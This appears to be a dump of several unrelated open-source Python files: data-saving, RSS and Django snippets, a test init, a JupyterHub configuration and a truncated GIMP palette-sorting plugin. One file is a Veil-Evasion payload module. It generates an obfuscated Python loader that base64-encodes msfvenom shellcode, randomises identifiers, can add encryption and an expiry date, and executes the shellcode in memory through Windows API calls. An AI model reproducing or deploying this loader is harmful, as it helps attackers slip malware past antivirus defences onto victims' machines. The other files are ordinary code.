qres=(X1[1]-X1[0])/X1[1]
print("Constant dq/q from file: ",qres)
for i in range(len(X1)):
dq=X1[i]*qres
s="\t%e" % X1[i] +sep+"%e" % y1[i] +sep + "%e" % e1[i] + sep + "%e" % dq +"\n"
f.write(s)
f.close()
|
dymkowsk/mantid
|
scripts/Reflectometry/isis_reflectometry/saveModule.py
|
Python
|
gpl-3.0
| 3,083
|
# coding=utf-8
import re
import urlparse
from feedparser.api import parse
from feedparser.util import FeedParserDict
from sickbeard import logger
from sickrage.helper.exceptions import ex
def getFeed(url, request_headers=None, handlers=None):
parsed = list(urlparse.urlparse(url))
parsed[2] = re.sub("/{2,}", "/", parsed[2]) # replace two or more / with one
try:
feed = parse(url, False, False, request_headers, handlers=handlers)
if feed:
if 'entries' in feed:
return feed
elif 'error' in feed.feed:
err_code = feed.feed['error']['code']
err_desc = feed.feed['error']['description']
logger.log(u'RSS ERROR:[%s] CODE:[%s]' % (err_desc, err_code), logger.DEBUG)
else:
logger.log(u'RSS error loading url: ' + url, logger.DEBUG)
except Exception as e:
logger.log(u'RSS error: ' + ex(e), logger.DEBUG)
return FeedParserDict()
|
pkoutsias/SickRage
|
sickbeard/rssfeeds.py
|
Python
|
gpl-3.0
| 982
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class LoginConfig(AppConfig):
name = 'login'
|
InspectorIncognito/visualization
|
login/apps.py
|
Python
|
gpl-3.0
| 150
|
"""
This payload receives the msfvenom shellcode, base64 encodes it, and stores it within the payload.
At runtime, the executable decodes the shellcode and executes it in memory.
module by @christruncer
"""
import base64
from datetime import date
from datetime import timedelta
from modules.common import shellcode
from modules.common import helpers
from modules.common import encryption
class Payload:
def __init__(self):
# required options
self.description = "Base64 encoded shellcode is decoded at runtime and executed in memory"
self.language = "python"
self.extension = "py"
self.rating = "Excellent"
self.shellcode = shellcode.Shellcode()
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
}
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
|
g0tmi1k/veil-Evasion
|
modules/payloads/python/shellcode_inject/base64_substitution.py
|
Python
|
gpl-3.0
| 16,041
|
# (C) British Crown Copyright 2016, Met Office
#
# This file is part of Biggus.
#
# Biggus is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Biggus is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Biggus. If not, see <http://www.gnu.org/licenses/>.
"""Unit tests for `biggus._init`"""
from __future__ import absolute_import, division, print_function
from six.moves import (filter, input, map, range, zip) # noqa
|
pelson/biggus
|
biggus/tests/unit/init/__init__.py
|
Python
|
gpl-3.0
| 882
|
# THIS FILE IS CONTROLLED BY ELASTICLUSTER
# local modifications will be overwritten
# the next time `elasticluster setup` is run!
#
#
# Configuration file for jupyterhub.
#
#------------------------------------------------------------------------------
# JupyterHub(Application) configuration
#------------------------------------------------------------------------------
## An Application for starting a Multi-User Jupyter Notebook server.
## Grant admin users permission to access single-user servers.
#
# Users should be properly informed if this is enabled.
#c.JupyterHub.admin_access = False
## Class for authenticating users.
#
c.JupyterHub.authenticator_class = 'jupyterhub.auth.PAMAuthenticator'
## The base URL of the entire application
c.JupyterHub.base_url = '/'
## Whether to shutdown the proxy when the Hub shuts down.
#
#c.JupyterHub.cleanup_proxy = True
## Whether to shutdown single-user servers when the Hub shuts down.
#
#c.JupyterHub.cleanup_servers = True
## The config file to load
c.JupyterHub.config_file = '/etc/jupyterhub/jupyterhub_config.py'
## Number of days for a login cookie to be valid. Default is two weeks.
#
#c.JupyterHub.cookie_max_age_days = 14
## The cookie secret to use to encrypt cookies.
#
# Loaded from the JPY_COOKIE_SECRET env variable by default.
c.JupyterHub.cookie_secret = open('/var/lib/jupyterhub/jupyterhub_cookie_secret', 'rb').read().strip()
## File in which to store the cookie secret.
c.JupyterHub.cookie_secret_file = 'jupyterhub_cookie_secret'
## The location of jupyterhub data files (e.g. /usr/local/share/jupyter/hub)
c.JupyterHub.data_files_path = '/opt/anaconda3/share/jupyter/hub'
## Include any kwargs to pass to the database connection. See
# sqlalchemy.create_engine for details.
#c.JupyterHub.db_kwargs = {}
## url for the database. e.g. `sqlite:///jupyterhub.sqlite`
c.JupyterHub.db_url = 'sqlite:////var/lib/jupyterhub/jupyterhub.sqlite'
## show debug output in configurable-http-proxy
#c.JupyterHub.debug_proxy = False
## File to write PID Useful for daemonizing jupyterhub.
c.JupyterHub.pid_file = '/var/run/jupyterhub.pid'
## The public facing port of the proxy
c.JupyterHub.port = 443
## The Proxy Auth token.
#
# Loaded from the CONFIGPROXY_AUTH_TOKEN env variable by default.
c.JupyterHub.proxy_auth_token = open('/var/lib/jupyterhub/jupyterhub_proxy_auth_token', 'rb').read().strip()
## The command to start the http proxy.
#
# Only override if configurable-http-proxy is not on your PATH
c.JupyterHub.proxy_cmd = ['/usr/local/lib/node_modules/configurable-http-proxy/bin/configurable-http-proxy']
## Dict of token:servicename to be loaded into the database.
#
# Allows ahead-of-time generation of API tokens for use by externally managed
# services.
#c.JupyterHub.service_tokens = {}
## List of service specification dictionaries.
#
# A service
#
# For instance::
#
# services = [
# {
# 'name': 'cull_idle',
# 'command': ['/path/to/cull_idle_servers.py'],
# },
# {
# 'name': 'formgrader',
# 'url': 'http://127.0.0.1:1234',
# 'token': 'super-secret',
# 'environment':
# }
# ]
#c.JupyterHub.services = []
## The class to use for spawning single-user servers.
#
c.JupyterHub.spawner_class = 'jupyterhub.spawner.LocalProcessSpawner'
## Path to SSL certificate file for the public facing interface of the proxy
#
# Use with ssl_key
c.JupyterHub.ssl_cert = '/etc/jupyterhub/jupyterhub.crt.pem'
## Path to SSL key file for the public facing interface of the proxy
#
# Use with ssl_cert
c.JupyterHub.ssl_key = '/etc/jupyterhub/jupyterhub.key.pem'
#------------------------------------------------------------------------------
# Spawner(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## The command used for starting the single-user server.
#
# Provide either a string or a list containing the path to the startup script
# command. Extra arguments, other than this path, should be provided via `args`.
#
# This is usually set if you want to start the single-user server in a different
# python environment (with virtualenv/conda) than JupyterHub itself.
#
# Some spawners allow shell-style expansion here, allowing you to use
# environment variables. Most, including the default, do not. Consult the
# documentation for your spawner to verify!
c.Spawner.cmd = ['/opt/anaconda3/bin/jupyterhub-singleuser']
## Minimum number of cpu-cores a single-user notebook server is guaranteed to
# have available.
#
# If this value is set to 0.5, allows use of 50% of one CPU. If this value is
# set to 2, allows use of up to 2 CPUs.
#
# Note that this needs to be supported by your spawner for it to work.
#c.Spawner.cpu_guarantee = None
## Maximum number of cpu-cores a single-user notebook server is allowed to use.
#
# If this value is set to 0.5, allows use of 50% of one CPU. If this value is
# set to 2, allows use of up to 2 CPUs.
#
# The single-user notebook server will never be scheduled by the kernel to use
# more cpu-cores than this. There is no guarantee that it can access this many
# cpu-cores.
#
# This needs to be supported by your spawner for it to work.
#c.Spawner.cpu_limit = None
## Enable debug-logging of the single-user server
#c.Spawner.debug = False
## The URL the single-user server should start in.
#
# `{username}` will be expanded to the user's username
#
# Example uses:
# - You can set `notebook_dir` to `/` and `default_url` to `/home/{username}` to allow people to
# navigate the whole filesystem from their notebook, but still start in their home directory.
# - You can set this to `/lab` to have JupyterLab start by default, rather than Jupyter Notebook.
#c.Spawner.default_url = ''
## Disable per-user configuration of single-user servers.
#
# When starting the user's single-user server, any config file found in the
# user's $HOME directory will be ignored.
#
# Note: a user could circumvent this if the user modifies their Python
# environment, such as when they have their own conda environments / virtualenvs
# / containers.
#c.Spawner.disable_user_config = False
## Whitelist of environment variables for the single-user server to inherit from
# the JupyterHub process.
#
# This whitelist is used to ensure that sensitive information in the JupyterHub
# process's environment (such as `CONFIGPROXY_AUTH_TOKEN`) is not passed to the
# single-user server's process.
#c.Spawner.env_keep = ['PATH', 'PYTHONPATH', 'CONDA_ROOT', 'CONDA_DEFAULT_ENV', 'VIRTUAL_ENV', 'LANG', 'LC_ALL']
## Extra environment variables to set for the single-user server's process.
#
# Environment variables that end up in the single-user server's process come from 3 sources:
# - This `environment` configurable
# - The JupyterHub process' environment variables that are whitelisted in `env_keep`
# - Variables to establish contact between the single-user notebook and the hub (such as JUPYTERHUB_API_TOKEN)
#
# The `enviornment` configurable should be set by JupyterHub administrators to
# add installation specific environment variables. It is a dict where the key is
# the name of the environment variable, and the value can be a string or a
# callable. If it is a callable, it will be called with one parameter (the
# spawner instance), and should return a string fairly quickly (no blocking
# operations please!).
#
# Note that the spawner class' interface is not guaranteed to be exactly same
# across upgrades, so if you are using the callable take care to verify it
# continues to work after upgrades!
#c.Spawner.environment = {}
## Timeout (in seconds) before giving up on a spawned HTTP server
#
# Once a server has successfully been spawned, this is the amount of time we
# wait before assuming that the server is unable to accept connections.
#c.Spawner.http_timeout = 30
## The IP address (or hostname) the single-user server should listen on.
#
# The JupyterHub proxy implementation should be able to send packets to this
# interface.
#c.Spawner.ip = '127.0.0.1'
## Minimum number of bytes a single-user notebook server is guaranteed to have
# available.
#
# Allows the following suffixes:
# - K -> Kilobytes
# - M -> Megabytes
# - G -> Gigabytes
# - T -> Terabytes
#
# This needs to be supported by your spawner for it to work.
#c.Spawner.mem_guarantee = None
## Maximum number of bytes a single-user notebook server is allowed to use.
#
# Allows the following suffixes:
# - K -> Kilobytes
# - M -> Megabytes
# - G -> Gigabytes
# - T -> Terabytes
#
# If the single user server tries to allocate more memory than this, it will
# fail. There is no guarantee that the single-user notebook server will be able
# to allocate this much memory - only that it can not allocate more than this.
#
# This needs to be supported by your spawner for it to work.
#c.Spawner.mem_limit = None
## Path to the notebook directory for the single-user server.
#
# The user sees a file listing of this directory when the notebook interface is
# started. The current interface does not easily allow browsing beyond the
# subdirectories in this directory's tree.
#
# `~` will be expanded to the home directory of the user, and {username} will be
# replaced with the name of the user.
#
# Note that this does *not* prevent users from accessing files outside of this
# path! They can do so with many other means.
c.Spawner.notebook_dir = '~'
#------------------------------------------------------------------------------
# Authenticator(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## Base class for implementing an authentication provider for JupyterHub
## Set of users that will have admin rights on this JupyterHub.
#
# Admin users have extra privilages:
# - Use the admin panel to see list of users logged in
# - Add / remove users in some authenticators
# - Restart / halt the hub
# - Start / stop users' single-user servers
# - Can access each individual users' single-user server (if configured)
#
# Admin access should be treated the same way root access is.
#
# Defaults to an empty set, in which case no user has admin access.
#c.Authenticator.admin_users = set()
## Whitelist of usernames that are allowed to log in.
#
# Use this with supported authenticators to restrict which users can log in.
# This is an additional whitelist that further restricts users, beyond whatever
# restrictions the authenticator has in place.
#
# If empty, does not perform any additional restriction.
#c.Authenticator.whitelist = set()
#------------------------------------------------------------------------------
# LocalAuthenticator(Authenticator) configuration
#------------------------------------------------------------------------------
## Base class for Authenticators that work with local Linux/UNIX users
#
# Checks for local users, and can attempt to create them if they exist.
## The command to use for creating users as a list of strings
#
# For each element in the list, the string USERNAME will be replaced with the
# user's username. The username will also be appended as the final argument.
#
# For Linux, the default value is:
#
# ['adduser', '-q', '--gecos', '""', '--disabled-password']
#
# To specify a custom home directory, set this to:
#
# ['adduser', '-q', '--gecos', '""', '--home', '/customhome/USERNAME', '--
# disabled-password']
#
# This will run the command:
#
# adduser -q --gecos "" --home /customhome/river --disabled-password river
#
# when the user 'river' is created.
#c.LocalAuthenticator.add_user_cmd = []
## If set to True, will attempt to create local system users if they do not exist
# already.
#
# Supports Linux and BSD variants only.
c.LocalAuthenticator.create_system_users = False
## Whitelist all users from this UNIX group.
#
# This makes the username whitelist ineffective.
#c.LocalAuthenticator.group_whitelist = set()
#------------------------------------------------------------------------------
# PAMAuthenticator(LocalAuthenticator) configuration
#------------------------------------------------------------------------------
## Authenticate local UNIX users with PAM
## The text encoding to use when communicating with PAM
#c.PAMAuthenticator.encoding = 'utf8'
## Whether to open a new PAM session when spawners are started.
#
# This may trigger things like mounting shared filsystems, loading credentials,
# etc. depending on system configuration, but it does not always work.
#
# If any errors are encountered when opening/closing PAM sessions, this is
# automatically set to False.
#c.PAMAuthenticator.open_sessions = True
## The name of the PAM service to use for authentication
#c.PAMAuthenticator.service = 'login'
|
TissueMAPS/TmDeploy
|
elasticluster/elasticluster/share/playbooks/roles/jupyterhub/files/etc/jupyterhub/jupyterhub_config.py
|
Python
|
gpl-3.0
| 12,907
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gimpfu import *
# little known, colorsys is part of Python's stdlib
from colorsys import rgb_to_yiq
from textwrap import dedent
from random import randint
gettext.install("gimp20-python", gimp.locale_directory, unicode=True)
AVAILABLE_CHANNELS = (_("Red"), _("Green"), _("Blue"),
_("Luma (Y)"),
_("Hue"), _("Saturation"), _("Value"),
_("Saturation (HSL)"), _("Lightness (HSL)"),
_("Index"),
_("Random"))
GRAIN_SCALE = (1.0, 1.0 , 1.0,
1.0,
360., 100., 100.,
100., 100.,
16384.,
float(0x7ffffff),
100., 256., 256.,
256., 360.,)
SELECT_ALL = 0
SELECT_SLICE = 1
SELECT_AUTOSLICE = 2
SELECT_PARTITIONED = 3
SELECTIONS = (SELECT_ALL, SELECT_SLICE, SELECT_AUTOSLICE, SELECT_PARTITIONED)
def noop(v, i):
return v
def to_hsv(v, i):
return v.to_hsv()
def to_hsl(v, i):
return v.to_hsl()
def to_yiq(v, i):
return rgb_to_yiq(*v[:-1])
def to_index(v, i):
return (i,)
def to_random(v, i):
return (randint(0, 0x7fffffff),)
channel_getters = [ (noop, 0), (noop, 1), (noop, 2),
(to_yiq, 0),
(to_hsv, 0), (to_hsv, 1), (to_hsv, 2),
(to_hsl, 1), (to_hsl, 2),
(to_index, 0),
(to_random, 0)]
try:
from colormath.color_objects import RGBColor, LabColor, LCHabColor
AVAILABLE_CHANNELS = AVAILABLE_CHANNELS + (_("Lightness (LAB)"),
_("A-color"), _("B-color"),
_("Chroma (LCHab)"),
_("Hue (LCHab)"))
to_lab = lambda v,i: RGBColor(*v[:-1]).convert_to('LAB').get_value_tuple()
to_lchab = (lambda v,i:
RGBColor(*v[:-1]).convert_to('LCHab').get_value_tuple())
channel_getters.extend([(to_lab, 0), (to_lab, 1), (to_lab, 2),
(to_lchab, 1), (to_lchab, 2)])
except ImportError:
pass
def parse_slice(s, numcolors):
"""Parse a slice spec and return (start, nrows, length)
All items are optional. Omitting them makes the largest possible selection that
exactly fits the other items.
start:nrows,length
'' selects all items, as does ':'
':4,' makes a 4-row selection out of all colors (length auto-determined)
':4' also.
':1,4' selects the first 4 colors
':,4' selects rows of 4 colors (nrows auto-determined)
':4,4' selects 4 rows of 4 colors
'4:' selects a single row of all colors after 4, inclusive.
'4:,4' selects rows of 4 colors, starting at 4 (nrows auto-determined)
'4:4,4' selects 4 rows of 4 colors (16 colors total), beginning at index 4.
'4' is illegal (ambiguous)
In general, slices are comparable to a numpy sub-array.
'start at element START, with shape (NROWS, LENGTH)'
"""
s = s.strip()
def notunderstood():
raise ValueError('Slice %r not understood. Should be in format'
' START?:NROWS?,ROWLENGTH? eg. "0:4,16".' % s)
def _int(v):
try:
return int(v)
except ValueError:
notunderstood()
if s in ('', ':', ':,'):
return 0, 1, numcolors # entire palette, one row
if s.count(':') != 1:
notunderstood()
rowpos = s.find(':')
start = 0
if rowpos > 0:
start = _int(s[:rowpos])
numcolors -= start
nrows = 1
if ',' in s:
commapos = s.find(',')
nrows = s[rowpos+1:commapos]
length = s[commapos+1:]
if not nrows:
if not length:
notunderstood()
else:
length = _int(length)
if length == 0:
notunderstood()
nrows = numcolors // length
if numcolors % length:
nrows = -nrows
elif not length:
nrows = _int(nrows)
if nrows == 0:
notunderstood()
length = numcolors // nrows
if numcolors % nrows:
length = -length
else:
nrows = _int(nrows)
if nrows == 0:
notunderstood()
length = _int(length)
if length == 0:
notunderstood()
else:
nrows = _int(s[rowpos+1:])
if nrows == 0:
notunderstood()
length = numcolors // nrows
if numcolors % nrows:
length = -length
return start, nrows, length
def quantization_grain(channel, g):
"Given a channel and a quantization, return the size of a quantization grain"
g = max(1.0, g)
if g <= 1.0:
g = 0.00001
else:
g = max(0.00001, GRAIN_SCALE[channel] / g)
return g
def palette_sort(palette, selection, slice_expr, channel1, ascending1,
channel2, ascending2, quantize, pchannel, pquantize):
grain1 = quantization_grain(channel1, quantize)
grain2 = quantization_grain(channel2, quantize)
pgrain = quantization_grain(pchannel, pquantize)
#If palette is read only, work on a copy:
editable = pdb.gimp_palette_is_editable(palette)
if not editable:
palette = pdb.gimp_palette_duplicate (palette)
num_colors = pdb.gimp_palette_get_info (palette)
start, nrows, length = None, None, None
if selection == SELECT_AUTOSLICE:
def find_index(color, startindex=0):
for i in range(startindex, num_colors):
c = pdb.gimp_palette_entry_get_color (palette, i)
if c == color:
return i
return None
def hexcolor(c):
return "#%02x%02x%02x" % tuple(c[:-1])
fg = pdb.gimp_context_get_foreground()
bg = pdb.gimp_context_get_background()
start = find_index(fg)
end = find_index(bg)
if start is None:
raise ValueError("Couldn't find foreground color %r in palette" % list(fg))
if end is None:
